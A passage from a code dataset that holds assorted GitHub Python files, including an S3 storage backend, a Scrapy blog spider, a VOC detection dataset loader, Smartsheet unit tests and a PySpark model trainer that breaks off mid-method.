path.lstrip(\"/\")\n\n # We need a trailing slash on non-empty prefixes because a path like:\n #\n # /path/to/requirements\n #\n # will happily prefix match:\n #\n # /path/to/requirements.txt\n #\n # which is not the intention!\n #\n if path != \"\":\n path = path.rstrip(\"/\") + \"/\"\n\n objects = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=path)\n\n directories = set()\n entries = set()\n properties = {}\n\n for objectSummary in objects:\n relative_key = objectSummary.key.replace(path, \"\", 1).lstrip(\"/\")\n\n if \"/\" in relative_key:\n directory_name = re.sub(\"/.*\", \"\", relative_key)\n if directory_name:\n directories.add(directory_name)\n entries.add(directory_name)\n elif relative_key != \"\":\n entries.add(relative_key)\n 
properties[relative_key] = {\n \"size\": objectSummary.size,\n \"timestamp\": objectSummary.last_modified,\n \"e_tag\": objectSummary.e_tag,\n }\n\n return {\n \"directories\": list(directories),\n \"entries\": list(entries),\n \"properties\": properties,\n }\n\n def delete_path(self, delete_path):\n \"\"\"Delete an object from an S3 bucket. We assume an object exists, if\n it doesn't then the generator returned by the S3 library (Boto3) cannot\n be iterated, and we raise a StorageException.\n \"\"\"\n if delete_path.startswith(os.sep):\n LOGGER.info(\n \"S3 path to delete {} begins with {}; removing from path prior to deletion\".format(\n delete_path, os.sep\n )\n )\n delete_path = delete_path.lstrip(os.sep)\n obj = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=delete_path)\n items = False\n for object_summary in obj:\n items = True\n resp = object_summary.delete()\n LOGGER.debug(\"S3 response when attempting to delete:\")\n LOGGER.debug(pprint.pformat(resp))\n if not items:\n err_str = f\"No packages found in S3 at: {delete_path}\"\n LOGGER.warning(err_str)\n raise StorageException(err_str)\n\n def move_to_storage_service(self, src_path, dest_path, dest_space):\n self._ensure_bucket_exists()\n bucket = self.resource.Bucket(self.bucket_name)\n\n # strip leading slash on src_path\n src_path = src_path.lstrip(\"/\").rstrip(\".\")\n dest_path = dest_path.rstrip(\".\")\n\n # Directories need to have trailing slashes to ensure they are created\n # on the staging path.\n if not utils.package_is_file(dest_path):\n dest_path = os.path.join(dest_path, \"\")\n\n objects = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=src_path)\n\n for objectSummary in objects:\n dest_file = objectSummary.key.replace(src_path, dest_path, 1)\n self.space.create_local_directory(dest_file)\n if not os.path.isdir(dest_file):\n bucket.download_file(objectSummary.key, dest_file)\n\n def move_from_storage_service(self, src_path, dest_path, package=None):\n self._ensure_bucket_exists()\n bucket = self.resource.Bucket(self.bucket_name)\n\n if os.path.isdir(src_path):\n # ensure trailing slash on both paths\n src_path = os.path.join(src_path, \"\")\n dest_path = os.path.join(dest_path, \"\")\n\n # strip leading slash on dest_path\n dest_path = dest_path.lstrip(\"/\")\n\n for path, dirs, files in os.walk(src_path):\n for basename in files:\n entry = os.path.join(path, basename)\n dest = entry.replace(src_path, dest_path, 1)\n\n self.upload_object(bucket, dest, entry)\n\n elif os.path.isfile(src_path):\n # strip leading slash on dest_path\n dest_path = dest_path.lstrip(\"/\")\n\n self.upload_object(bucket, dest_path, src_path)\n\n else:\n raise StorageException(\n _(\"%(path)s is neither a file nor a directory, may not exist\")\n % {\"path\": src_path}\n )\n\n def upload_object(self, bucket, path, data):\n extra_args = {}\n mtype = utils.get_mimetype(path)\n if mtype:\n extra_args[\"ContentType\"] = mtype\n\n with open(data, \"rb\") as d:\n bucket.upload_fileobj(d, path, ExtraArgs=extra_args)\n","repo_name":"artefactual/archivematica-storage-service","sub_path":"storage_service/locations/models/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"47"} +{"seq_id":"9429212355","text":"#!/usr/local/bin/python\n\nfh = open('../country.txt', 'rb')\n\nindex = {}\nwhile True:\n line = fh.readline()\n if not line: break\n fields = line.decode().split(',')\n index[fields[0]] = fh.tell() - len(line) 
\n\nwhile True: \n key = input('Enter a country: ') \n if key == '':\n break\n\n if not key in index:\n print(f\"'{key}' not in the file.\")\n continue\n \n fh.seek(index[key])\n print(fh.readline().decode(), end=\"\")\n","repo_name":"flathunt/pylearn","sub_path":"examples/07 io-pickle-n-shelve/direct.py","file_name":"direct.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39216472814","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.http import Request\nfrom urllib import parse\nimport re\n\n# from scrapy.loader import ItemLoader\nfrom jobboleCrawler.items import ArticleItemLoader\nfrom jobboleCrawler.items import JobboleArticleItem\nfrom jobboleCrawler.utils.common import get_md5\n\n\nclass JobboleSpider(scrapy.Spider):\n name = 'jobbole'\n allowed_domains = ['blog.jobbole.com']\n start_urls = ['http://blog.jobbole.com/all-posts/']\n\n def parse(self, response):\n\n post_nodes = response.css(\"#archive > .post.floated-thumb > .post-thumb > a\");\n for post_node in post_nodes:\n img_url = post_node.css(\"img::attr(src)\").extract_first(\"\");\n post_url = post_node.css(\"::attr(href)\").extract_first(\"\");\n yield Request(url=parse.urljoin(response.url, post_url), callback=self.parse_detail, meta={\"front_img_url\": img_url})\n\n next_url = response.css('a.next.page-numbers::attr(href)').extract_first(\"\")\n if next_url:\n next_page = int(re.match(r\".*?(\\d+).*\", next_url).group(1))\n if next_page >= 3: # only crawl first two page\n return\n yield Request(url=parse.urljoin(response.url, next_url), callback=self.parse)\n\n def parse_detail(self, response):\n\n front_img_url = response.meta.get('front_img_url', \"\")\n\n # load Itemloader\n item_loader = ArticleItemLoader(item=JobboleArticleItem(), response=response)\n item_loader.add_css(\"title\", \".entry-header h1::text\")\n item_loader.add_value(\"url\", response.url)\n item_loader.add_value(\"url_object_id\", get_md5(response.url))\n item_loader.add_css(\"create_date\", \"p.entry-meta-hide-on-mobile::text\")\n item_loader.add_css(\"praise_nums\", \".vote-post-up h10::text\")\n item_loader.add_css(\"fav_nums\", \".bookmark-btn::text\")\n item_loader.add_css(\"tag_list\", \"p.entry-meta-hide-on-mobile a::text\")\n item_loader.add_css(\"content\", \"div.entry\")\n item_loader.add_value(\"front_img_url\", front_img_url)\n\n article_item = item_loader.load_item()\n\n yield article_item\n\n","repo_name":"wk633/articleCrawler","sub_path":"jobboleCrawler/jobboleCrawler/spiders/jobbole.py","file_name":"jobbole.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70847639182","text":"#!/usr/bin/env python3\nimport os, sys, re\nfrom ROOT import gROOT\nfrom rootUtil3 import useAtlasStyle, waitRootCmd, savehistory, mkupHistSimple, get_default_fig_dir\nfunlist=[]\n\nsDir = get_default_fig_dir()\nsTag = 'test_'\nsDirectly = False\nif gROOT.IsBatch(): sDirectly = True\n\ndef test():\n\n return \"In test\"\n\n waitRootCmd()\nfunlist.append(test)\n\nif __name__ == '__main__':\n savehistory('.')\n useAtlasStyle()\n for fun in funlist: print(fun())\n","repo_name":"dajiaonao/scripts_collection","sub_path":"py_scripts/templete_new.py","file_name":"templete_new.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18245192548","text":"# 
https://leetcode.com/problems/find-the-celebrity/\n\n# The knows API is already defined for you.\n# return a bool, whether a knows b\n# def knows(a: int, b: int) -> bool:\n\n\nclass Solution:\n def findCelebrity(self, n: int) -> int:\n \"\"\"\n 0123456 7 89\n c\n \n 01 -> know(0, 1) true: 0 is not c, 1 might be c\n false: 1 is not c, 0 might be c\n \"\"\"\n # first we need to find a candidate by looking through the list\n candidate = 0\n for i in range(1, n):\n if knows(candidate, i): # if candidate knows i, candidate must not be the celebrity while i might be the celebrity.\n candidate = i\n\n # after finding the candidate, we need to check if the candidate is valid.\n for i in range(n):\n if i != candidate and knows(candidate, i): # check if candidate knows others. if yes, it is a invalid candidate\n return -1\n if not knows(i, candidate): # check if all others know candidate. If not, it is a invalid candidate.\n return -1\n return candidate\n","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/277.Find_the_Celebrity.py","file_name":"277.Find_the_Celebrity.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"32703915646","text":"rows = int(input())\nwall = []\nfree = \" \"\nfor i in range(rows):\n wall.append(input())\n counter = wall[i].count(\"#\")\n\n if counter < len(wall[i]):\n if \"k\" in wall[i]:\n if free in wall[i]:\n print(f\"K!@index:{wall[i].index('k')} free slots:{wall[i].count(free)}@index:{wall[i].index(free)}\")\n else:\n print(f\"K! but ain't a way\")\n else:\n print(\"No way\")\nprint(wall)\n","repo_name":"vvakrilov/python_courses","sub_path":"02. Fundamental/10. More Exercises/15. Kate's Way Out (Lists Advansed More Exercises).py","file_name":"15. 
Kate's Way Out (Lists Advansed More Exercises).py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"30087223442","text":"import sys\nfrom familia_wrapper import InferenceEngineWrapper\n\nif sys.version_info < (3,0):\n    input = raw_input\n\nif __name__ == '__main__':\n    if len(sys.argv) < 4:\n        sys.stderr.write(\"Usage:python {} {} {} {}.\\n\".format(\n            sys.argv[0], \"model_dir\", \"conf_file\", \"emb_file\"))\n        exit(-1)\n\n    # Read the command-line arguments\n    model_dir = sys.argv[1]\n    conf_file = sys.argv[2]\n    emb_file = sys.argv[3]\n    # Create the InferenceEngineWrapper object\n    inference_engine_wrapper = InferenceEngineWrapper(model_dir, conf_file, emb_file)\n    while True:\n        # Read the short text (query) and the long text (document)\n        query = input(\"Enter Query: \").strip()\n        doc = input(\"Enter Document: \").strip()\n        query_seg = inference_engine_wrapper.tokenize(query)\n        doc_seg = inference_engine_wrapper.tokenize(doc)\n        distances = inference_engine_wrapper.cal_query_doc_similarity(query_seg, doc_seg)\n        # Print the results\n        print(\"LDA Similarity = {}\".format(distances[0]))\n        print(\"TWE similarity = {}\".format(distances[1]))\n","repo_name":"baidu/Familia","sub_path":"python/demo/query_doc_sim_demo.py","file_name":"query_doc_sim_demo.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"zh","doc_type":"code","stars":2622,"dataset":"github-code","pt":"47"}
{"seq_id":"10002201252","text":"import xml.etree.ElementTree as ET\n\nimport torch\nfrom torchvision import datasets as VD\nfrom torchvision.io import read_image\n\n\ndef det_collate_fn(batch):\n    return tuple(zip(*batch))\n\n\nclass VOCDetection(object):\n    def __new__(cls,\n                root,\n                train=True,\n                transform=None,\n                download=False):\n        if train:\n            train_kwargs = dict(image_set='trainval', transforms=transform, download=download)\n            train_2007 = _VOCDetection(root, year='2007', **train_kwargs)\n            train_2012 = _VOCDetection(root, year='2012', **train_kwargs)\n            remove_difficult(train_2007)\n            remove_difficult(train_2012)\n            return train_2007 + train_2012\n\n        else:\n            val_set = _VOCDetection(root, year='2007', image_set='test', transforms=transform, download=download)\n            return val_set\n\n    def __len__(self):\n        ...\n\n\nclass _VOCDetection(VD.VOCDetection):\n    voc_bbox_label_names = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n                            'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa',\n                            'train', 'tvmonitor')\n\n    def __getitem__(self, item):\n\n        img = read_image(self.images[item])\n        tgt = self.parse_voc_xml(ET.parse(self.annotations[item]).getroot())\n        bbox = []\n        label = []\n        difficult = []\n        objs = tgt['annotation']['object']\n        if not isinstance(objs, list):\n            objs = [objs]\n        for obj in objs:\n            bbox.append([int(obj['bndbox'][k]) for k in ('xmin', 'ymin', 'xmax', 'ymax')])\n            label.append(self.voc_bbox_label_names.index(obj['name']))\n            difficult.append(int(obj['difficult']))\n        tgt = dict(boxes=torch.tensor(bbox, dtype=torch.long),\n                   labels=torch.tensor(label, dtype=torch.long),\n                   difficult=torch.tensor(difficult, dtype=torch.long))\n        if self.transforms is not None:\n            bbox = tgt['boxes'].float()\n            img, bbox = self.transforms(img, bbox)\n            tgt['boxes'] = bbox.long()\n        return img, tgt\n\n\ndef remove_difficult(dataset: _VOCDetection):\n    # iterate in reverse so the pop(index) calls below do not shift indices\n    # that have not been visited yet\n    for index in reversed(range(len(dataset))):\n        target = dataset.parse_voc_xml(ET.parse(dataset.annotations[index]).getroot())\n        objs = target['annotation']['object']\n        if not isinstance(objs, list):\n            objs = [objs]\n        
keep = [obj for obj in objs if obj['difficult'] != '1']\n        target['annotation']['object'] = keep\n\n        # drop samples whose objects are all difficult; this must test the filtered\n        # list, otherwise empty-after-filtering samples are never removed\n        if len(keep) == 0:\n            dataset.images.pop(index)\n            dataset.annotations.pop(index)\n","repo_name":"moskomule/homura","sub_path":"homura/vision/data/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"47"}
{"seq_id":"13533982891","text":"import json\nimport logging\nfrom unittest.mock import patch\n\nimport pytest\nimport smartsheet\nimport data_module.helper as helper\nimport app.variables as app_vars\nimport data_module.write_data as write_data\nimport data_module.get_data as get_data\nfrom freezegun import freeze_time\n\n_, cwd = helper.get_local_paths()\nlogger = logging.getLogger(__name__)\n\n\n# @pytest.fixture(scope=\"module\")\n# def sheet_fixture():\n#     import data_module.helper as helper\n#     with open(cwd + '/dev_program_plan.json') as f:\n#         sheet_json = json.load(f)\n\n#     def no_uuid_col_fixture(sheet_json):\n#         json_copy = sheet_json.copy()\n#         json_copy['columns'][20]['name'] = \"Not UUID\"\n#         no_uuid_col = smartsheet.models.Sheet(json_copy)\n#         return no_uuid_col\n\n#     def no_summary_col_fixture(sheet_json):\n#         json_copy = sheet_json.copy()\n#         json_copy['columns'][4]['name'] = \"Not Summary\"\n#         no_summary_col = smartsheet.models.Sheet(json_copy)\n#         return no_summary_col\n\n#     sheet = smartsheet.models.Sheet(sheet_json)\n#     col_map = helper.get_column_map(sheet)\n#     sheet_no_uuid_col = no_uuid_col_fixture(sheet_json)\n#     sheet_no_summary_col = no_summary_col_fixture(sheet_json)\n#     return sheet, col_map, sheet_no_uuid_col, sheet_no_summary_col\n\n\n# @pytest.fixture\n# def row_fixture():\n#     with open(cwd + '/dev_program_plan_row.json') as f:\n#         linked_row_json = json.load(f)\n#     with open(cwd + '/dev_program_plan_row.json') as f:\n#         unlinked_row_json = json.load(f)\n#     linked_row = smartsheet.models.Row(linked_row_json)\n#     unlinked_row = smartsheet.models.Row(unlinked_row_json)\n#     return linked_row, unlinked_row\n\n\n# @pytest.fixture(scope=\"module\")\n# def index_fixture():\n#     import data_module.get_data as get_data\n#     with open(cwd + '/dev_jira_index_sheet.json') as f:\n#         sheet_json = json.load(f)\n#     index_sheet = smartsheet.models.Sheet(sheet_json)\n\n#     @patch(\"data_module.smartsheet_api.get_sheet\", return_value=index_sheet)\n#     def load_jira_index_fixture(mock_0):\n#         jira_index_sheet, jira_index_col_map, jira_index_rows \\\n#             = get_data.load_jira_index(index_sheet.id)\n#         return jira_index_sheet, jira_index_col_map, jira_index_rows\n\n#     jira_index_sheet, jira_index_col_map, jira_index_rows \\\n#         = load_jira_index_fixture()\n#     return jira_index_sheet, jira_index_col_map, jira_index_rows\n\n\n# @pytest.fixture\n# def env():\n#     return \"-debug\"\n\n\n@pytest.fixture\ndef uuids():\n    uuid_value = [\"7208979009955716-3683235938232196-\"\n                  \"7010994181433220-202105112138550000\"]\n    jira_value = \"JAR-123\"\n    uuid_list = [\"7208979009955716-3683235938232196-\"\n                 \"7010994181433220-202105112138550000\"]\n    jira_data_values = [\"JAR-123\", \"JAR-456\"]\n    return uuid_value, jira_value, uuid_list, jira_data_values\n\n\n@pytest.fixture\ndef src_data():\n    data = {\n        \"UUID\": \"7208979009955716-3683235938232196-\"\n                \"7010994181433220-202105112138550000\", # Type: str\n        \"Tasks\": \"Retrospective\", # Type: str\n        \"Description\": \"Thoughts on how the project went.\", # Type: str\n        \"Status\": \"In Progress\", # Type: str\n        \"Assigned To\": \"link@twitch.tv\", # Type: str\n        \"Jira Ticket\": 
\"ING-12342\", # Type: str\n \"Duration\": None, # Type: str\n \"Start\": \"2021-03-31T08:00:00\", # Type: str\n \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n \"Predecessors\": \"38FS +1w\", # Type: str\n \"Summary\": \"False\" # Type: str\n }\n return data\n\n\n@pytest.fixture\n@freeze_time(\"2021-11-18 21:23:54\")\n# TODO: Static return and check for actual values\ndef project_indexes(sheet_fixture):\n import app.config as config\n import data_module.get_data as get_data\n sheet, _, _, _ = sheet_fixture\n project_uuid_index = get_data.get_all_row_data([sheet],\n app_vars.sheet_columns,\n config.minutes)\n _, sub_index = get_data.get_sub_indexes(project_uuid_index)\n return project_uuid_index, sub_index\n\n\ndef test_write_uuids_0():\n with pytest.raises(TypeError):\n write_data.write_uuids(\"sheets_to_update\")\n\n\ndef test_write_uuids_1(sheet_fixture):\n sheet, _, _, _ = sheet_fixture\n sheets_to_update = {}\n sheets_to_update[sheet.id] = {\n \"sheet_name\": sheet.name, \"row_data\": {}}\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n def test_0(mock_0):\n sheets_updated = write_data.write_uuids(sheets_to_update)\n return sheets_updated\n\n result_0 = test_0()\n assert isinstance(result_0, int)\n assert result_0 == 0\n\n\ndef test_write_uuids_2(sheet_fixture):\n _, col_map, _, _ = sheet_fixture\n with open(cwd + '/dev_program_plan.json') as f:\n blank_uuid_sheet = json.load(f)\n\n for row in blank_uuid_sheet['rows']:\n for cell in row['cells']:\n if cell['columnId'] == col_map[app_vars.uuid_col]:\n cell['value'] = None\n cell['objectValue'] = None\n cell['displayValue'] = None\n blank_uuid_sheet = smartsheet.models.Sheet(blank_uuid_sheet)\n sheets_to_update = get_data.get_blank_uuids([blank_uuid_sheet])\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n def test_0(mock_0):\n sheets_updated = write_data.write_uuids(sheets_to_update)\n return sheets_updated\n\n result_0 = test_0()\n assert isinstance(result_0, int)\n assert result_0 == 1\n\n\ndef test_write_jira_index_cell_links_0():\n with pytest.raises(TypeError):\n write_data.write_jira_index_cell_links(\"project_sub_index\")\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links({})\n\n\ndef test_write_jira_index_cell_links_1(index_sheet_fixture,\n sheet_fixture):\n\n sheet, _, _, _ = sheet_fixture\n index_sheet, index_col_map, index_rows, _ = index_sheet_fixture\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_0(mock_0, mock_1, mock_2):\n project_sub_index = {}\n project_sub_index[31337] = \"1337\"\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links(project_sub_index)\n return True\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_1(mock_0, mock_1, mock_2):\n project_sub_index = 
{}\n project_sub_index[\"31337\"] = 1337\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links(project_sub_index)\n return True\n\n result_0 = test_0()\n result_1 = test_1()\n assert result_0 is True\n assert result_1 is True\n\n\ndef test_write_jira_index_cell_links_2(project_indexes, index_sheet_fixture,\n sheet_fixture):\n _, project_sub_index = project_indexes\n sheet, _, _, _ = sheet_fixture\n index_sheet, index_col_map, index_rows, _ = index_sheet_fixture\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_0(mock_0, mock_1, mock_2):\n var_0 = write_data.write_jira_index_cell_links(project_sub_index)\n return var_0\n\n result_0 = test_0()\n result_1 = \"No Jira Ticket updates needed for Sheet ID\" in result_0\n assert isinstance(result_0, str)\n assert result_1 is True\n\n\n# TODO: Build a version of the sheet we can use to link and get a successful\n# msg back.\n# def test_write_jira_index_cell_links_3(project_indexes, index_fixture,\n# sheet_fixture, row_fixture):\n# _, project_sub_index = project_indexes\n# sheet, _, _, _ = sheet_fixture\n# jira_index_sheet, jira_index_col_map, jira_index_rows = index_fixture\n# row, _ = row_fixture\n\n# result = smartsheet.models.Result()\n # result.message = \"SUCCESS\"\n # result.result_code = 0\n\n # @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n # return_value=result)\n# @patch(\"data_module.build_data.build_row\", return_value=row)\n# @patch(\"data_module.get_data.load_jira_index\",\n# return_value=(jira_index_sheet, jira_index_col_map,\n# jira_index_rows))\n# @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n# def test_0(mock_0, mock_1, mock_2, mock_3):\n# var_0 = write_data.write_jira_index_cell_links(project_sub_index)\n# return var_0\n\n# result_0 = test_0()\n# result_1 = \"Writing\" in result_0\n# assert isinstance(result_0, str)\n# assert result_1 is True\n\n\n# def test_write_predecessor_dates_0(src_data, project_indexes):\n# project_data_index, _ = project_indexes\n# with pytest.raises(TypeError):\n# write_data.write_predecessor_dates(\"src_data\", project_data_index)\n# with pytest.raises(TypeError):\n# write_data.write_predecessor_dates(src_data, \"project_data_index\")\n# with pytest.raises(ValueError):\n# data_copy = src_data.copy()\n# data_copy[\"UUID\"] = 1337\n# write_data.write_predecessor_dates(data_copy, project_data_index)\n# with pytest.raises(ValueError):\n# data_copy = src_data.copy()\n# data_copy.pop(\"UUID\", None)\n# write_data.write_predecessor_dates(data_copy, project_data_index)\n# # Format of the src_data should be:\n# # {\n# # \"UUID\": \"7208979009955716-3683235938232196-\n# # 7010994181433220-202105112138550000\", # Type: str\n# # \"Tasks\": \"Retrospective\", # Type: str\n# # \"Description\": \"Thoughts on how the project went.\", # Type: str\n# # \"Status\": \"In Progress\", # Type: str\n# # \"Assigned To\": \"link@twitch.tv\", # Type: str\n# # \"Jira Ticket\": \"ING-12342\", # Type: str\n# # \"Duration\": None, # Type: str\n# # \"Start\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Predecessors\": \"38FS +1w\", # Type: str\n# # \"Summary\": \"False\" # Type: str\n# # }\n\n\n# def 
test_write_predecessor_dates_1(src_data, project_indexes,\n# sheet_fixture, row_fixture, cell_fixture):\n# project_data_index, _ = project_indexes\n# sheet, col_map, _, _ = sheet_fixture\n# _, unlinked_row = row_fixture\n# pred_cell, _, _, _, _, _ = cell_fixture\n\n# # Format of the src_data should be:\n# # {\n# # \"UUID\": \"7208979009955716-3683235938232196-\n# # 7010994181433220-202105112138550000\", # Type: str\n# # \"Tasks\": \"Retrospective\", # Type: str\n# # \"Description\": \"Thoughts on how the project went.\", # Type: str\n# # \"Status\": \"In Progress\", # Type: str\n# # \"Assigned To\": \"link@twitch.tv\", # Type: str\n# # \"Jira Ticket\": \"ING-12342\", # Type: str\n# # \"Duration\": None, # Type: str\n# # \"Start\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Predecessors\": \"38FS +1w\", # Type: str\n# # \"Summary\": \"False\" # Type: str\n# # }\n\n# result = smartsheet.models.Result()\n# result.message = \"SUCCESS\"\n# result.result_code = 0\n\n# @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n# @patch(\"data_module.helper.get_column_map\", return_value=col_map)\n# @patch(\"data_module.smartsheet_api.get_row\", return_value=unlinked_row)\n# @patch(\"data_module.helper.get_cell_data\",\n# return_value=pred_cell)\n# @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n# return_value=result)\n# def test_0(mock_0, mock_1, mock_2, mock_3, mock_4):\n# result_0 = write_data.write_predecessor_dates(src_data,\n# project_data_index)\n# return result_0\n# result_1 = test_0()\n# assert result_1 is True\n","repo_name":"herooftimeandspace/smartsheet-data-sync","sub_path":"test_unit/test_write_data.py","file_name":"test_write_data.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39594993407","text":"\nfrom src.entity.artifact_entity import DataTransformationArtifact,ModelTrainingArtifact,\\\n PartialModelTrainerMetricArtifact,PartialModelTrainerRefArtifact\nfrom src.entity.config_entity import ModelTrainerConfig\nfrom src.logger import logger\nfrom src.exception import FinanceException\nfrom src.entity.schema import FinanceDataSchema\nimport os, sys\nfrom pyspark.sql import DataFrame\nfrom pyspark.ml.feature import StringIndexer,StringIndexerModel\nfrom typing import List\nfrom pyspark.ml.feature import IndexToString\nfrom pyspark.ml import Pipeline,PipelineModel\nfrom pyspark.ml.classification import RandomForestClassifier, LogisticRegression\nfrom src.utils import get_score\nfrom src.config.spark_manager import spark_session \nclass ModelTrainer:\n\n def __init__(self, config:ModelTrainerConfig, artifact:DataTransformationArtifact,\n schema=FinanceDataSchema()) -> None:\n self.trainer_config = config\n self.transform_artifact= artifact\n self.schema = schema\n\n def get_train_test_dataframe(self)->List[DataFrame]:\n try:\n train_data_path = self.transform_artifact.transformed_train_file_path\n test_data_path = self.transform_artifact.transformed_test_file_path\n train_df = spark_session.read.parquet(train_data_path)\n test_df = spark_session.read.parquet(test_data_path)\n dataframes: List[DataFrame] = [train_df, test_df]\n return dataframes\n except Exception as exp:\n raise FinanceException(exp, sys)\n\n def get_model(self, label_indexer_model:StringIndexerModel)->Pipeline:\n try:\n stages = []\n logger.info(\"Creating Random Forest Classifier class.\")\n rand_forest_clf 
=RandomForestClassifier(labelCol=self.schema.target_indexed_label,\n featuresCol=self.schema.scaled_vector_input_features)\n\n logger.info(\"Creating Label generator\")\n label_generator = IndexToString(inputCol=self.schema.prediction_column_name, \n outputCol=f\"{self.schema.prediction_column_name}_{self.schema.target_column}\",\n labels=label_indexer_model.labels)\n\n stages.append(rand_forest_clf)\n stages.append(label_generator)\n pipeline = Pipeline(stages=stages)\n return pipeline\n except Exception as exp:\n raise FinanceException(exp, sys)\n \n def get_scores(self, dataframe:DataFrame, metric_names:List[str])->List[tuple]:\n try:\n if metric_names is None:\n metric_names = self.trainer_config.metric_list\n scores:List[tuple]=[]\n for metric in metric_names:\n score = get_score(metric_name=metric,\n dataframe=dataframe,\n label_col = self.schema.target_indexed_label,\n prediction_col=self.schema.prediction_column_name)\n\n scores.append((metric,score))\n\n return scores\n \n except Exception as exp:\n raise FinanceException(exp, sys)\n\n def export_trained_model(self, model:PipelineModel):\n try:\n transformed_pipeline_file_path = self.transform_artifact.exported_pipeline_file_path\n transformed_pipeline = PipelineModel.load(transformed_pipeline_file_path)\n\n # entire pipeline (DAta Transformation -> Model -> Label indexer)\n updated_stages = transformed_pipeline.stages + model.stages\n transformed_pipeline.stages = updated_stages\n trained_model_file_path = self.trainer_config.trained_model_file_path\n transformed_pipeline.save(trained_model_file_path)\n\n logger.info(\"Creating trained model directory\")\n trained_model_file_path = self.trainer_config.trained_model_file_path\n os.makedirs(os.path.dirname(trained_model_file_path), exist_ok=True)\n # transformed_pipeline.save(trained_model_file_path)\n ref_artifact = PartialModelTrainerRefArtifact(\n trained_model_file_path=trained_model_file_path,\n label_indexer_model_file_path=self.trainer_config.label_indexer_model_dir)\n\n logger.info(f\"Model trainer reference artifact: {ref_artifact}\")\n return ref_artifact\n\n except Exception as exp:\n raise FinanceException(exp, sys)\n def start_model_training(self)-> ModelTrainingArtifact:\n try:\n # 1 get Train test dataframe\n dataframes = self.get_train_test_dataframe()\n train_df, test_df = dataframes[0], dataframes[1]\n label_indexer = StringIndexer(inputCol=self.schema.target_column, outputCol=self.schema.target_indexed_label)\n label_indexer_model = label_indexer.fit(train_df)\n # save label indexer\n os.makedirs(os.path.dirname(self.trainer_config.label_indexer_model_dir), exist_ok=True)\n label_indexer_model.save(self.trainer_config.label_indexer_model_dir)\n # apply label transformation\n train_df=label_indexer_model.transform(train_df)\n test_df=label_indexer_model.transform(test_df)\n\n # 2. Get Trainer Model\n model =self.get_model(label_indexer_model)\n\n trained_model = model.fit(train_df)\n train_df_prediction = trained_model.transform(train_df)\n test_df_prediction = trained_model.transform(test_df)\n scores = self.get_scores(dataframe=train_df_prediction, metric_names=self.trainer_config.metric_list)\n \n\n # 3. 
